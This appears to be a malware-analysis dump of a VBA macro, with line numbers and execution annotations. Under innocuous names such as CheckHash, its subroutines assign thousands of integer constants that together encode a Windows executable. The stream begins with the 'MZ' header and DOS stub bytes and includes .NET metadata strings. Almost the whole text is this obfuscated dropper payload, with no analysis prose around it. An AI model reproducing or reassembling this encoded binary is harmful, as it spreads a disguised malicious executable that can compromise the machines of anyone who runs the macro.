                            Y = 6649196

                            2088

                            Y = 1701669204

                            2089

                            Y = 1818313586

                            2090

                            Y = 1667326572

                            2091

                            Y = 2035482731

                            2092

                            Y = 1835365491

                            2093

                            Y = 1852397358

                            2094

                            Y = 1937207140

                            2095

                            Y = 1919895086

                            2096

                            Y = 1124103021

                            2097

                            Y = 1735287144

                            2098

                            Y = 1951596645

                            2099

                            Y = 1633971809

                            2100

                            Y = 1867342962

                            2101

                            Y = 1701606756

                            2102

                            Y = 1920234561

                            2103

                            Y = 1953849961

                            2104

                            Y = 1414725733

                            2105

                            Y = 1919439937

                            2106

                            Y = 1097097573

                            2107

                            Y = 1769108596

                            2108

                            Y = 1702131042

                            2109

                            Y = 1920226048

                            2110

                            Y = 6778473

                            2111

                            Y = 1601463655

                            2112

                            Y = 1735288140

                            2113

                            Y = 1392535668

                            2114

                            Y = 1852404340

                            2115

                            Y = 1291875175

                            2116

                            Y = 1090544745

                            2117

                            Y = 1275093875

                            2118

                            Y = 1124101733

                            2119

                            Y = 1124102760

                            2120

                            Y = 1702260335

                            2121

                            Y = 1869181810

                            2122

                            Y = 1409315694

                            2123

                            Y = 1920226159

                            2124

                            Y = 6778473

                            2125

                            Y = 1668181827

                            2126

                            Y = 1392538721

                            2127

                            Y = 1702130553

                            2128

                            Y = 1700015725

                            2129

                            Y = 1157657720

                            2130

                            Y = 1685021550

                            2131

                            Y = 6778473

                            2132

                            Y = 1601463655

                            2133

                            Y = 944133205

                            2134

                            Y = 1131369472

                            2135

                            Y = 1098015080

                            2136

                            Y = 2036429426

                            2137

                            Y = 1952794368

                            2138

                            Y = 1702132034

                            2139

                            Y = 1866662003

                            2140

                            Y = 1919252078

                            2141

                            Y = 1867776116

                            2142

                            Y = 1702060354

                            2143

                            Y = 1951609910

                            2144

                            Y = 1735289202

                            2145

                            Y = 1836008192

                            2146

                            Y = 1701994864

                            2147

                            Y = 1752458573

                            2148

                            Y = 1375757423

                            2149

                            Y = 1634496613

                            2150

                            Y = 1174431075

                            2151

                            Y = 1114468210

                            2152

                            Y = 912618337

                            2153

                            Y = 1920226100

                            2154

                            Y = 6778473

                            2155

                            Y = 1953724755

                            2156

                            Y = 1227779429

                            2157

                            Y = 1766195279

                            2158

                            Y = 1951622508

                            2159

                            Y = 1835099506

                            2160

                            Y = 1818838528

                            2161

                            Y = 1685015909

                            2162

                            Y = 1766195301

                            2163

                            Y = 1665230188

                            2164

                            Y = 1936942435

                            2165

                            Y = 1954103808

                            2166

                            Y = 1699872869

                            2167

                            Y = 1392534625

                            2168

                            Y = 1634038388

                            2169

                            Y = 1918304365

                            2170

                            Y = 6648937

                            2171

                            Y = 1868001092

                            2172

                            Y = 1984260978

                            2173

                            Y = 1215589989

                            2174

                            Y = 1818521185

                            2175

                            Y = 1912631909

                            2176

                            Y = 1987013989

                            2177

                            Y = 1866751845

                            2178

                            Y = 1802661719

                            2179

                            Y = 1684300032

                            2180

                            Y = 1466909791

                            2181

                            Y = 7041647

                            2182

                            Y = 1601463655

                            2183

                            Y = 1967289161

                            2184

                            Y = 1375762803

                            2185

                            Y = 1868000885

                            2186

                            Y = 1919249266

                            2187

                            Y = 1853453121

                            2188

                            Y = 1917059171

                            2189

                            Y = 1231386217

                            2190

                            Y = 7300718

                            2191

                            Y = 1148478791

                            2192

                            Y = 1702259058

                            2193

                            Y = 1701249139

                            2194

                            Y = 1934188404

                            2195

                            Y = 1684104530

                            2196

                            Y = 1917059193

                            2197

                            Y = 1415935593

                            2198

                            Y = 6647929

                            2199

                            Y = 1601463655

                            2200

                            Y = 1986622020

                            2201

                            Y = 1886999653

                            2202

                            Y = 1766064229

                            2203

                            Y = 1952671090

                            2204

                            Y = 1232695919

                            2205

                            Y = 7300718

                            2206

                            Y = 1601463655

                            2207

                            Y = 1953460050

                            2208

                            Y = 1701996868

                            2209

                            Y = 1919906915

                            2210

                            Y = 1766195321

                            2211

                            Y = 2035508588

                            2212

                            Y = 1835365491

                            2213

                            Y = 1868983881

                            2214

                            Y = 1952802560

                            2215

                            Y = 1819625055

                            2216

                            Y = 1835093612

                            2217

                            Y = 1766064229

                            2218

                            Y = 1952671090

                            2219

                            Y = 7959151

                            2220

                            Y = 1918985555

                            2221

                            Y = 1884252259

                            2222

                            Y = 1852795252

                            2223

                            Y = 1952794368

                            2224

                            Y = 1701603654

                            2225

                            Y = 1632632947

                            2226

                            Y = 1191209076

                            2227

                            Y = 1766224997

                            2228

                            Y = 1632527724

                            2229

                            Y = 1767335277

                            2230

                            Y = 1970235508

                            2231

                            Y = 1954039156

                            2232

                            Y = 1769172581

                            2233

                            Y = 1124101743

                            2234

                            Y = 1952540018

                            2235

                            Y = 1919501413

                            2236

                            Y = 1869898597

                            2237

                            Y = 1174436210

                            2238

                            Y = 6646889

                            2239

                            Y = 1936291909

                            2240

                            Y = 1224766324

                            2241

                            Y = 1919251566

                            2242

                            Y = 1769235297

                            2243

                            Y = 1090547311

                            2244

                            Y = 1767338096

                            2245

                            Y = 2037666670

                            2246

                            Y = 1392534892

                            2247

                            Y = 1819043176

                            2248

                            Y = 1818838528

                            2249

                            Y = 1953775973

                            2250

                            Y = 1969383794

                            2251

                            Y = 7562612

                            2252

                            Y = 1098147155

                            2253

                            Y = 1769108596

                            2254

                            Y = 1702131042

                            2255

                            Y = 2035482739

                            2256

                            Y = 1835365491

                            2257

                            Y = 1853182510

                            2258

                            Y = 1701669236

                            2259

                            Y = 1836008238

                            2260

                            Y = 1701603696

                            2261

                            Y = 1919243122

                            2262

                            Y = 1701013878

                            2263

                            Y = 1665204339

                            2264

                            Y = 1936942435

                            2265

                            Y = 1750361189

                            2266

                            Y = 1735749490

                            2267

                            Y = 1869762664

                            2268

                            Y = 1953654128

                            2269

                            Y = 1953775993

                            2270

                            Y = 1969383794

                            2271

                            Y = 1224762740

                            2272

                            Y = 842232942

                            2273

                            Y = 1883332352

                            2274

                            Y = 1667853424

                            2275

                            Y = 1869182049

                            2276

                            Y = 1866727534

                            2277

                            Y = 1701672291

                            2278

                            Y = 7566446

                            2279

                            Y = 1601463655

                            2280

                            Y = 1969450820

                            2281

                            Y = 1953391981

                            2282

                            Y = 1866596467

                            2283

                            Y = 1634036847

                            2284

                            Y = 2035482734

                            2285

                            Y = 1835365491

                            2286

                            Y = 1717916206

                            2287

                            Y = 1952671084

                            2288

                            Y = 7237481

                            2289

                            Y = 1936943437

                            2290

                            Y = 6778473

                            2291

                            Y = 1970037078

                            2292

                            Y = 1968242789

                            2293

                            Y = 1090548841

                            2294

                            Y = 1768714352

                            2295

                            Y = 1769234787

                            2296

                            Y = 1816358511

                            2297

                            Y = 7566177

                            2298

                            Y = 1601463667

                            2299

                            Y = 1769171286

                            2300

                            Y = 6646882

                            2301

                            Y = 1601463667

                            2302

                            Y = 2003789907

                            2303

                            Y = 1970497878

                            2304

                            Y = 1631743073

                            2305

                            Y = 1164142963

                            2306

                            Y = 1869900132

                            2307

                            Y = 1718550642

                            2308

                            Y = 1701013862

                            2309

                            Y = 1667845376

                            2310

                            Y = 1869836146

                            2311

                            Y = 1328444518

                            2312

                            Y = 1667851878

                            2313

                            Y = 1866673765

                            2314

                            Y = 1291871602

                            2315

                            Y = 1967222643

                            2316

                            Y = 1634561908

                            2317

                            Y = 1852795252

                            2318

                            Y = 1969448275

                            2319

                            Y = 2037672306

                            2320

                            Y = 1952805632

                            2321

                            Y = 1953841503

                            2322

                            Y = 1952542063

                            2323

                            Y = 1399746409

                            2324

                            Y = 1920295781

                            2325

                            Y = 7959657

                            2326

                            Y = 1181709133

                            2327

                            Y = 1449487465

                            2328

                            Y = 1684630625

                            2329

                            Y = 1869182049

                            2330

                            Y = 1685015918

                            2331

                            Y = 1702035557

                            2332

                            Y = 1766219636

                            2333

                            Y = 1633052012

                            2334

                            Y = 1633970540

                            2335

                            Y = 1852795252

                            2336

                            Y = 1952802560

                            2337

                            Y = 1835093599

                            2338

                            Y = 1766195301

                            2339

                            Y = 1850303852

                            2340

                            Y = 1140879206

                            2341

                            Y = 1415935073

                            2342

                            Y = 6647145

                            2343

                            Y = 1969450820

                            2344

                            Y = 1953391981

                            2345

                            Y = 1667845376

                            2346

                            Y = 1869836146

                            2347

                            Y = 1445885030

                            2348

                            Y = 1227777378

                            2349

                            Y = 1919251566

                            2350

                            Y = 1124102255

                            2351

                            Y = 1298490479

                            2352

                            Y = 1819632751

                            2353

                            Y = 1112932453

                            2354

                            Y = 1886220099

                            2355

                            Y = 1852141167

                            2356

                            Y = 1767112820

                            2357

                            Y = 1884513645

                            2358

                            Y = 1157656161

                            2359

                            Y = 1701672302

                            2360

                            Y = 1869898098

                            2361

                            Y = 1701249138

                            2362

                            Y = 1917017972

                            2363

                            Y = 1769234789

                            2364

                            Y = 1767140975

                            2365

                            Y = 1728079213

                            2366

                            Y = 1415541861

                            2367

                            Y = 1332047209

                            2368

                            Y = 2036417638

                            2369

                            Y = 1952802560

                            2370

                            Y = 1970227295

                            2371

                            Y = 1728082802

                            2372

                            Y = 1298101349

                            2373

                            Y = 1953853033

                            2374

                            Y = 1728082789

                            2375

                            Y = 1398764645

                            2376

                            Y = 1852793701

                            2377

                            Y = 1728082788

                            2378

                            Y = 1298101349

                            2379

                            Y = 1768713321

                            2380

                            Y = 1868785011

                            2381

                            Y = 7562350

                            2382

                            Y = 1601463655

                            2383

                            Y = 1953718604

                            2384

                            Y = 1701012289

                            2385

                            Y = 1767142259

                            2386

                            Y = 1728079213

                            2387

                            Y = 1281324133

                            2388

                            Y = 1467249505

                            2389

                            Y = 1702127986

                            2390

                            Y = 1701669204

                            2391

                            Y = 1667845376

                            2392

                            Y = 1869836146

                            2393

                            Y = 1445885030

                            2394

                            Y = 1635087209

                            2395

                            Y = 1935753836

                            2396

                            Y = 1177445225

                            2397

                            Y = 1231383657

                            2398

                            Y = 1884487759

                            2399

                            Y = 1634296677

                            2400

                            Y = 1919501420

                            2401

                            Y = 1869898597

                            2402

                            Y = 1936025970

                            2403

                            Y = 1952802560

                            2404

                            Y = 1835357279

                            2405

                            Y = 1699151984

                            2406

                            Y = 1818838644

                            2407

                            Y = 1835093605

                            2408

                            Y = 1866661989

                            2409

                            Y = 1325431152

                            2410

                            Y = 7234928

                            2411

                            Y = 1668236383

                            2412

                            Y = 1852140917

                            2413

                            Y = 1701249140

                            2414

                            Y = 1632853876

                            2415

                            Y = 1866884470

                            2416

                            Y = 1952542066

                            2417

                            Y = 1986089728

                            2418

                            Y = 846414181

                            2419

                            Y = 1346524672

                            2420

                            Y = 1701474162

                            2421

                            Y = 1728083043

                            2422

                            Y = 1449096293

                            2423

                            Y = 1869762626

                            2424

                            Y = 1952671082

                            2425

                            Y = 1112956672

                            2426

                            Y = 1785688656

                            2427

                            Y = 7627621

                            2428

                            Y = 1866678870

                            2429

                            Y = 1852797037

                            2430

                            Y = 1937010277

                            2431

                            Y = 1952802560

                            2432

                            Y = 1128420959

                            2433

                            Y = 1869639023

                            2434

                            Y = 1953391982

                            2435

                            Y = 1449066611

                            2436

                            Y = 1836008258

                            2437

                            Y = 1701736304

                            2438

                            Y = 7566446

                            2439

                            Y = 1835365449

                            2440

                            Y = 1112956672

                            2441

                            Y = 1886220099

                            2442

                            Y = 1852141167

                            2443

                            Y = 1701249140

                            2444

                            Y = 1866686324

                            2445

                            Y = 1867343204

                            2446

                            Y = 1701606756

                            2447

                            Y = 1866686208

                            2448

                            Y = 1867343204

                            2449

                            Y = 1701606756

                            2450

                            Y = 1684291840

                            2451

                            Y = 1836020294

                            2452

                            Y = 1769108563

                            2453

                            Y = 1392535406

                            2454

                            Y = 6649441

                            2455

                            Y = 1601463655

                            2456

                            Y = 1920298824

                            2457

                            Y = 1684291840

                            2458

                            Y = 1920298824

                            2459

                            Y = 1701249139

                            2460

                            Y = 1766678388

                            2461

                            Y = 1702131054

                            2462

                            Y = 1684291840

                            2463

                            Y = 1970170189

                            2464

                            Y = 7562612

                            2465

                            Y = 1601463655

                            2466

                            Y = 1868784979

                            2467

                            Y = 1090544750

                            2468

                            Y = 1699964004

                            2469

                            Y = 1684959075

                            2470

                            Y = 1701249139

                            2471

                            Y = 1766678388

                            2472

                            Y = 1936288876

                            2473

                            Y = 1852793701

                            2474

                            Y = 1681981540

                            2475

                            Y = 1818840420

                            2476

                            Y = 1702062444

                            2477

                            Y = 1684959075

                            2478

                            Y = 1702035571

                            2479

                            Y = 1917017972

                            2480

                            Y = 1769234789

                            2481

                            Y = 1767140975

                            2482

                            Y = 1929405805

                            2483

                            Y = 1281324133

                            2484

                            Y = 1098150753

                            2485

                            Y = 1936024419

                            2486

                            Y = 1835619443

                            2487

                            Y = 1702035557

                            2488

                            Y = 1632395124

                            2489

                            Y = 1918334067

                            2490

                            Y = 1415935081

                            2491

                            Y = 6647145

                            2492

                            Y = 1701602628

                            2493

                            Y = 1224762740

                            2494

                            Y = 1836412485

                            2495

                            Y = 1650553445

                            2496

                            Y = 828401004

                            2497

                            Y = 1684291840

                            2498

                            Y = 1735287122

                            2499

                            Y = 1699872869

                            2500

                            Y = 1953391971

                            2501

                            Y = 1701603654

                            2502

                            Y = 1701249139

                            2503

                            Y = 1699897204

                            2504

                            Y = 1953391971

                            2505

                            Y = 1701603654

                            2506

                            Y = 1701249139

                            2507

                            Y = 1866686324

                            2508

                            Y = 7630453

                            2509

                            Y = 1701012818

                            2510

                            Y = 1766225006

                            2511

                            Y = 1728079212

                            2512

                            Y = 1230992485

                            2513

                            Y = 7169396

                            2514

                            Y = 1601463655

                            2515

                            Y = 1752457552

                            2516

                            Y = 1952794368

                            2517

                            Y = 1836412485

                            2518

                            Y = 1952543333

                            2519

                            Y = 1728082543

                            2520

                            Y = 1130329189

                            2521

                            Y = 1701999221

                            2522

                            Y = 1191212142

                            2523

                            Y = 2017817701

                            2524

                            Y = 1936614772

                            2525

                            Y = 7237481

                            2526

                            Y = 1935754060

                            2527

                            Y = 1884225637

                            2528

                            Y = 1952543333

                            2529

                            Y = 7565935

                            2530

                            Y = 1886220099

                            2531

                            Y = 1399157345

                            2532

                            Y = 1852404340

                            2533

                            Y = 1681981543

                            2534

                            Y = 1867317348

                            2535

                            Y = 1699636598

                            2536

                            Y = 1224766584

                            2537

                            Y = 1886611780

                            2538

                            Y = 1650553711

                            2539

                            Y = 1140876652

                            2540

                            Y = 1869640553

                            2541

                            Y = 1409312115

                            2542

                            Y = 1920090479

                            2543

                            Y = 1107327329

                            2544

                            Y = 1918987881

                            2545

                            Y = 1634030201

                            2546

                            Y = 7497060

                            2547

                            Y = 1601463655

                            2548

                            Y = 1667594309

                            2549

                            Y = 1650553973

                            2550

                            Y = 1632658796

                            2551

                            Y = 1375758452

                            2552

                            Y = 1231315301

                            2553

                            Y = 842232942

                            2554

                            Y = 1952802560

                            2555

                            Y = 1935753823

                            2556

                            Y = 1920226149

                            2557

                            Y = 7168357

                            2558

                            Y = 1601463655

                            2559

                            Y = 1769172816

                            2560

                            Y = 1852795252

                            2561

                            Y = 1937330944

                            2562

                            Y = 778921332

                            2563

                            Y = 1734437188

                            2564

                            Y = 1953722222

                            2565

                            Y = 7562089

                            2566

                            Y = 1969382724

                            2567

                            Y = 1650550631

                            2568

                            Y = 1950442860

                            2569

                            Y = 1651077748

                            2570

                            Y = 6648949

                            2571

                            Y = 1969382724

                            2572

                            Y = 1852401511

                            2573

                            Y = 1685015911

                            2574

                            Y = 1124103013

                            2575

                            Y = 1768975727

                            2576

                            Y = 1769234796

                            2577

                            Y = 1699901039

                            2578

                            Y = 1635279212

                            2579

                            Y = 1852795252

                            2580

                            Y = 1953775987

                            2581

                            Y = 1969383794

                            2582

                            Y = 1375757684

                            2583

                            Y = 1769238133

                            2584

                            Y = 1866687853

                            2585

                            Y = 1952542829

                            2586

                            Y = 1818845801

                            2587

                            Y = 1098478697

                            2588

                            Y = 1769108596

                            2589

                            Y = 1702131042

                            2590

                            Y = 1936933120

                            2591

                            Y = 1818389861

                            2592

                            Y = 1818838649

                            2593

                            Y = 1919243877

                            2594

                            Y = 1852795251

                            2595

                            Y = 1920234561

                            2596

                            Y = 1953849961

                            2597

                            Y = 2035482725

                            2598

                            Y = 1835365491

                            2599

                            Y = 1853182510

                            2600

                            Y = 1701669236

                            2601

                            Y = 1953384750

                            2602

                            Y = 1886351973

                            2603

                            Y = 1987208531

                            2604

                            Y = 1936024425

                            2605

                            Y = 1769293568

                            2606

                            Y = 1953775972

                            2607

                            Y = 1969383794

                            2608

                            Y = 1124099444

                            2609

                            Y = 1767271791

                            2610

                            Y = 1818388851

                            2611

                            Y = 1953775973

                            2612

                            Y = 1969383794

                            2613

                            Y = 1090545012

                            2614

                            Y = 1835365235

                            2615

                            Y = 1417243746

                            2616

                            Y = 1701077362

                            2617

                            Y = 1802658157

                            2618

                            Y = 1920234561

                            2619

                            Y = 1953849961

                            2620

                            Y = 1933639781

                            2621

                            Y = 1651336563

                            2622

                            Y = 1866692972

                            2623

                            Y = 1769109872

                            2624

                            Y = 1098147943

                            2625

                            Y = 1769108596

                            2626

                            Y = 1702131042

                            2627

                            Y = 1936933120

                            2628

                            Y = 1818389861

                            2629

                            Y = 1869762681

                            2630

                            Y = 1952675172

                            2631

                            Y = 1920234561

                            2632

                            Y = 1953849961

                            2633

                            Y = 1933639781

                            2634

                            Y = 1651336563

                            2635

                            Y = 1866692972

                            2636

                            Y = 1851879533

                            2637

                            Y = 1953775993

                            2638

                            Y = 1969383794

                            2639

                            Y = 1090545012

                            2640

                            Y = 1835365235

                            2641

                            Y = 1148808290

                            2642

                            Y = 1919120229

                            2643

                            Y = 1769238633

                            2644

                            Y = 1950445167

                            2645

                            Y = 1651077748

                            2646

                            Y = 6648949

                            2647

                            Y = 1702064961

                            2648

                            Y = 2037146221

                            2649

                            Y = 1819568468

                            2650

                            Y = 1953775973

                            2651

                            Y = 1969383794

                            2652

                            Y = 1660970356

                            2653

                            Y = 1886155380

                            2654

                            Y = 1818586721

                            2655

                            Y = 1702389038

                            2656

                            Y = 0

                            2657

                            Y = 6496512

                            2658

                            Y = 7471220

                            2659

                            Y = 7340140

                            2660

                            Y = 7209057

                            2661

                            Y = 7077989

                            2662

                            Y = 7340129

                            2663

                            For I = 1 To 2

                            2664

                            Y = 7340144

                            2665

                            Next

                            2666

                            Y = - 2147483536

                            2667

                            Y = 1258309761

                            2668

                            Y = 1493189888

                            2669

                            Y = 1275092736

                            2670

                            Y = 1124093696

                            2671

                            Y = 1275085056

                            2672

                            Y = 1291869952

                            2673

                            Y = 1124090112

                            2674

                            Y = 1224755200

                            2675

                            Y = 1157647872

                            2676

                            Y = 1392532480

                            2677

                            Y = 1174425344

                            2678

                            Y = 1459639296

                            2679

                            Y = 1375748352

                            2680

                            Y = 1543521536

                            2681

                            Y = 1761627392

                            2682

                            Y = 1912627968

                            2683

                            Y = 1929408256

                            2684

                            Y = 1711304448

                            2685

                            Y = 1543533568

                            2686

                            Y = 1761629952

                            2687

                            Y = 1677749760

                            2688

                            Y = 1996517120

                            2689

                            Y = 1543533312

                            2690

                            Y = 1962951424

                            2691

                            Y = 1912631808

                            2692

                            Y = 1845519616

                            2693

                            Y = 1442870272

                            2694

                            Y = 1912628480

                            2695

                            Y = 1761637120

                            2696

                            Y = 1845522176

                            2697

                            Y = 1375755264

                            2698

                            Y = 1845523712

                            2699

                            Y = 1125318656

                            2700

                            Y = 1912632320

                            2701

                            Y = 1879075840

                            2702

                            Y = 1845518592

                            2703

                            Y = 1811965184

                            2704

                            Y = 1216151552

                            2705

                            Y = 1157647104

                            2706

                            Y = 1593858304

                            2707

                            Y = 1426080512

                            2708

                            Y = 1375752704

                            2709

                            Y = 1308640512

                            2710

                            Y = 1593857024

                            2711

                            Y = 1392530688

                            2712

                            Y = 1375749376

                            2713

                            Y = 1392532480

                            2714

                            Y = 1711304448

                            2715

                            Y = 1996518400

                            2716

                            Y = 1912627456

                            2717

                            Y = 1543529728

                            2718

                            Y = 1761627392

                            2719

                            Y = 1912627968

                            2720

                            Y = 1929408256

                            2721

                            Y = 1711304448

                            2722

                            Y = 1543533568

                            2723

                            Y = 1711296256

                            2724

                            Y = 1761633792

                            2725

                            Y = 1694524160

                            2726

                            Y = 822107136

                            2727

                            Y = 771765248

                            2728

                            Y = 1543516160

                            2729

                            Y = 1862293248

                            2730

                            Y = 1677750784

                            2731

                            Y = 1392532480

                            2732

                            Y = 1660970240

                            2733

                            Y = 1912632576

                            2734

                            Y = 1946183936

                            2735

                            Y = 30976

                            2736

                            Y = 1258309755

                            2737

                            Y = 1493189888

                            2738

                            Y = 1124097792

                            2739

                            Y = 1375753472

                            2740

                            Y = 1157648896

                            2741

                            Y = 1409306112

                            2742

                            Y = 1426087680

                            2743

                            Y = 1157649152

                            2744

                            Y = 1543524864

                            2745

                            Y = 1862292224

                            2746

                            Y = 1946183168

                            2747

                            Y = 1627420416

                            2748

                            Y = 1694528000

                            2749

                            Y = 1291869184

                            2750

                            Y = 1660971264

                            2751

                            Y = 1862300160

                            2752

                            Y = 1862300416

                            2753

                            Y = 1946183168

                            2754

                            Y = 1325423616

                            2755

                            Y = 1711302144

                            2756

                            Y = 1660971264

                            2757

                            Y = 1543529728

                            2758

                            Y = 872427776

                            2759

                            Y = 805318144

                            2760

                            Y = 1459641344

                            2761

                            Y = 1912631040

                            2762

                            Y = 1543529472

                            2763

                            Y = 1879068416

                            2764

                            Y = 1761637376

                            2765

                            Y = 1845522176

                            2766

                            Y = 29440

                            2767

                            Y = 771762699

                            2768

                            Y = 1862296576

                            2769

                            Y = 25344

                            2770

                            Y = 973103903

                            2771

                            Y = 1426086912

                            2772

                            Y = 1694528256

                            2773

                            Y = 1929409024

                            2774

                            Y = 1342200832

                            2775

                            Y = 1644197120

                            2776

                            Y = 1761635328

                            2777

                            Y = 25344

                            2778

                            Y = 788725761

                            2779

                            Y = 553844736

                            2780

                            Y = 705363968

                            2781

                            Y = 1862282752

                            2782

                            Y = 1879077376

                            2783

                            Y = 1544355840

                            2784

                            Y = 1862292480

                            2785

                            Y = 1811967744

                            2786

                            Y = 29440

                            2787

                            Y = 1409309711

                            2788

                            Y = 1862299392

                            2789

                            Y = 1929407488

                            2790

                            Y = 23552

                            2791

                            Y = 1694510601

                            2792

                            Y = 1694529536

                            2793

                            Y = 705363968

                            2794

                            Y = 1694510592

                            2795

                            Y = 1694529536

                            2796

                            Y = 1543700480

                            2797

                            Y = 772341760

                            2798

                            Y = 1912631040

                            2799

                            Y = 28672

                            2800

                            Y = 1660961045

                            2801

                            Y = 1694524160

                            2802

                            Y = 1929409280

                            2803

                            Y = 1107318272

                            2804

                            Y = 1291865856

                            2805

                            Y = 1444347904

                            2806

                            Y = 1090535936

                            2807

                            Y = 1627412224

                            2808

                            Y = 1845522944

                            2809

                            Y = 1845520640

                            2810

                            Y = 1929406208

                            2811

                            Y = 1142620160

                            2812

                            Y = 1711301888

                            2813

                            Y = 1962959104

                            2814

                            Y = 1946184704

                            2815

                            Y = 1862288896

                            2816

                            Y = 1828745728

                            2817

                            Y = 1946181888

                            2818

                            Y = 1141309440

                            2819

                            Y = 1660972800

                            2820

                            Y = 772341760

                            2821

                            Y = 1862296576

                            2822

                            Y = 25344

                            2823

                            Y = 1912623195

                            2824

                            Y = 1979738368

                            2825

                            Y = 1946181888

                            2826

                            Y = 536896768

                            2827

                            Y = 1962952192

                            2828

                            Y = 1660972544

                            2829

                            Y = 1761637376

                            2830

                            Y = 1845522176

                            2831

                            Y = 1174413312

                            2832

                            Y = 671106304

                            2833

                            Y = 536892928

                            2834

                            Y = 1929396480

                            2835

                            Y = 1392517120

                            2836

                            Y = 1912632320

                            2837

                            Y = 1845520640

                            2838

                            Y = 687892224

                            2839

                            Y = 1090527232

                            2840

                            Y = 536900352

                            2841

                            Y = 1862287872

                            2842

                            Y = 1811967744

                            2843

                            Y = 1627415808

                            2844

                            Y = 218131968

                            2845

                            Y = 2560

                            2846

                            Y = 1845514075

                            2847

                            Y = 1157636096

                            2848

                            Y = 1912631808

                            2849

                            Y = 1912631040

                            2850

                            Y = 1375739904

                            2851

                            Y = 1929405696

                            2852

                            Y = 1828746496

                            2853

                            Y = 536896768

                            2854

                            Y = 1694518784

                            2855

                            Y = 1946187776

                            2856

                            Y = 1174419968

                            2857

                            Y = 536888576

                            2858

                            Y = 536886528

                            2859

                            Y = 1174415360

                            2860

                            Y = 1811966208

                            2861

                            Y = 1275094272

                            2862

                            Y = 1845519616

                            2863

                            Y = 1442850816

                            2864

                            Y = 536881408

                            2865

                            Y = 536886784

                            2866

                            Y = 822095104

                            2867

                            Y = 218114304

                            2868

                            Y = 16779776

                            2869

                            Y = 1845511453

                            2870

                            Y = 536896512

                            2871

                            Y = 1962952192

                            2872

                            Y = 1660972544

                            2873

                            Y = 1761637376

                            2874

                            Y = 1845522176

                            2875

                            Y = 167775488

                            2876

                            Y = 1347354624

                            2877

                            Y = 1761636864

                            2878

                            Y = 1627420160

                            2879

                            Y = 1694528512

                            2880

                            Y = 1342185472

                            2881

                            Y = 1862300160

                            2882

                            Y = 1694527488

                            2883

                            Y = 1946186240

                            2884

                            Y = 536901888

                            2885

                            Y = 1694518272

                            2886

                            Y = 536900608

                            2887

                            Y = 671111424

                            2888

                            Y = 1627411968

                            2889

                            Y = 1962961920

                            2890

                            Y = 536896768

                            2891

                            Y = 1929396480

                            2892

                            Y = 1275076608

                            2893

                            Y = 1845522176

                            2894

                            Y = 687892224

                            2895

                            Y = 167775488

                            2896

                            Y = 1344471040

                            2897

                            Y = 1946187008

                            2898

                            Y = 587210752

                            2899

                            Y = 738210048

                            2900

                            Y = 738205696

                            2901

                            Y = 1442848768

                            2902

                            Y = 1811964160

                            2903

                            Y = 1694528768

                            2904

                            Y = 167775488

                            2905

                            Y = 1159528448

                            2906

                            Y = 1677749760

                            2907

                            Y = 1342185472

                            2908

                            Y = 1862300160

                            2909

                            Y = 1694527488

                            2910

                            Y = 1946186240

                            2911

                            Y = 218134784

                            2912

                            Y = 2560

                            2913

                            Y = 1912623151

                            2914

                            Y = 1979738368

                            2915

                            Y = 1946181888

                            2916

                            Y = 536896768

                            2917

                            Y = 1962955520

                            2918

                            Y = 536896000

                            2919

                            Y = 1744847616

                            2920

                            Y = 1660970240

                            2921

                            Y = 1207986944

                            2922

                            Y = 1929404672

                            2923

                            Y = 218130432

                            2924

                            Y = 2560

                            2925

                            Y = 1325418007

                            2926

                            Y = 536891904

                            2927

                            Y = 1023428864

                            2928

                            Y = 536883456

                            2929

                            Y = 1325421568

                            2930

                            Y = 8192

                            2931

                            Y = 167775493

                            2932

                            Y = 1493499904

                            2933

                            Y = 15616

                            2934

                            Y = 1157647885

                            2935

                            Y = 1409308672

                            2936

                            Y = 167775488

                            2937

                            Y = 1158873088

                            2938

                            Y = 1677749760

                            2939

                            Y = 1392517120

                            2940

                            Y = 1644197120

                            2941

                            Y = 167775488

                            2942

                            Y = 1344995328

                            2943

                            Y = 1761636864

                            2944

                            Y = 1627420160

                            2945

                            Y = 1694528512

                            2946

                            Y = 1392517120

                            2947

                            Y = 1644197120

                            2948

                            Y = 1124081664

                            2949

                            Y = 1694525440

                            2950

                            Y = 1795187456

                            2951

                            Y = 1627408384

                            2952

                            Y = 1744859904

                            2953

                            Y = 1346043904

                            2954

                            Y = 1761636864

                            2955

                            Y = 1627420160

                            2956

                            Y = 1694528512

                            2957

                            Y = 1392517120

                            2958

                            Y = 1644197120

                            2959

                            Y = 1140858880

                            2960

                            Y = 1660972800

                            2961

                            Y = 1828746496

                            2962

                            Y = 1845519616

                            2963

                            Y = 1593865216

                            2964

                            End Sub

                            LineInstructionMeta Information
                            15

                            Private Sub CheckHash()

                            16

                            Y = 9460301

                            executed
                            17

                            Y = 3

                            18

                            Y = 4

                            19

                            Y = 65535

                            20

                            Y = 184

                            21

                            Y = 0

                            22

                            Y = 64

                            23

                            For I = 1 To 8

                            24

                            Y = 0

                            25

                            Next

                            26

                            Y = 128

                            27

                            Y = 247078670

                            28

                            Y = - 855002112

                            29

                            Y = 1275181089

                            30

                            Y = 1750344141

                            31

                            Y = 1881174889

                            32

                            Y = 1919381362

                            33

                            Y = 1663069537

                            34

                            Y = 1869508193

                            35

                            Y = 1700929652

                            36

                            Y = 1853190688

                            37

                            Y = 544106784

                            38

                            Y = 542330692

                            39

                            Y = 1701080941

                            40

                            Y = 168627502

                            41

                            Y = 36

                            42

                            Y = 0

                            43

                            Y = 17744

                            44

                            Y = 262476

                            45

                            Y = 1441267592

                            46

                            For I = 1 To 2

                            47

                            Y = 0

                            48

                            Next

                            49

                            Y = 16908512

                            50

                            Y = 721163

                            51

                            Y = 13312

                            52

                            Y = 20992

                            53

                            Y = 0

                            54

                            Y = 21118

                            55

                            Y = 8192

                            56

                            Y = 24576

                            57

                            Y = 4194304

                            58

                            Y = 8192

                            59

                            Y = 512

                            60

                            Y = 4

                            61

                            Y = 0

                            62

                            Y = 4

                            63

                            Y = 0

                            64

                            Y = 65536

                            65

                            Y = 1024

                            66

                            Y = 0

                            67

                            Y = - 2059403262

                            68

                            Y = 1048576

                            69

                            Y = 4096

                            70

                            Y = 1048576

                            71

                            Y = 4096

                            72

                            Y = 0

                            73

                            Y = 16

                            74

                            For I = 1 To 2

                            75

                            Y = 0

                            76

                            Next

                            77

                            Y = 21036

                            78

                            Y = 79

                            79

                            Y = 32768

                            80

                            Y = 19632

                            81

                            For I = 1 To 4

                            82

                            Y = 0

                            83

                            Next

                            84

                            Y = 57344

                            85

                            Y = 12

                            86

                            Y = 24576

                            87

                            Y = 28

                            88

                            For I = 1 To 10

                            89

                            Y = 0

                            90

                            Next

                            91

                            Y = 8192

                            92

                            Y = 8

                            93

                            For I = 1 To 2

                            94

                            Y = 0

                            95

                            Next

                            96

                            Y = 8200

